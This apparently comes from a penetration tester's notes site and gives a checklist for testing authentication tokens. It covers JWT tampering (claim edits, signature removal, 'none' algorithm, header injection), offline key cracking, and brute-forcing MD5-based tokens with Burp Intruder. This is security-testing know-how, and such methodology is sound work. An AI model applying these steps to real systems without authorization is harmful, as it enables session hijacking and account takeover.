AppSecNotes
Attack Tokens
All Token Types - Start Here
  • Pick a request that returns different responses for invalid tokens (e.g. any endpoint that requires authentication such as a basket or my account page).
  • Test if authenticated request works without the token.
  • When having 2 tokens, e.g. "session" and "stay-logged-in", always worth checking if the requests work with only one of them. Always test both tokens with the applicable method below.
Base64
  • Decode it.
  • If on a pen test and if login can be brute-forced run Burp Sequencer on the login request. If it is a base64 token check the "Base64-decode before analysing" checkbox.
  • Can it be brute-forced? If Sequencer was run, save the generated tokens and compare them. If not, log in with another user to compare the 2 tokens.
  • Check if tokens get destroyed after logging out to test for "Improper Session Management".
JWT - JSON Web Tokens
  • Analyse it with the JWT Editor extension, jwt.io or jwt_tool. Note down the algorithm in the header, might be relevant to mention it in a pen test report if it's weak.
  • Modify claims keeping the signature. Test changing the user to the one from the 2nd account and also to an invalid/inexistent user.
  • Remove the signature entirely.
  • Change the signature algorithm: e.g. to none.
  • Header Injection attack (if JWK or JKU or KID are there).
  • Using the the JWT Editor Burp Extension makes it quicker to test for JWT attacks.
  • Brute-force signature key offline with hashcat or jwt_tool. Note down if the secret can be found with a big wordlist. Online cracking should only be done for test labs or non-production environments.
MD5
  • Check if part of the token is the password of the user: $ echo -n 'user_password' | md5sum.
  • Can it be brute-forced? In case your own token is in the format username:md5_of_your_password try to brute-force it with Burp Intruder for other user:
    • selecting the md5_of_your_password as the place for the payload. Use a wordlist of passwords.
    • adding Hash:MD5 rule
    • add a prefix afterwards -> username:
    • Base64-encode everything
Serialized Tokens
  • Decode to inspect the token manually.
  • Immediately start a DAST scan at a GET request with the token if allowed.
  • Try token deserialization if there is any suspicion of serialization in the scanner results. Refer to Token Deserialization for a methodology.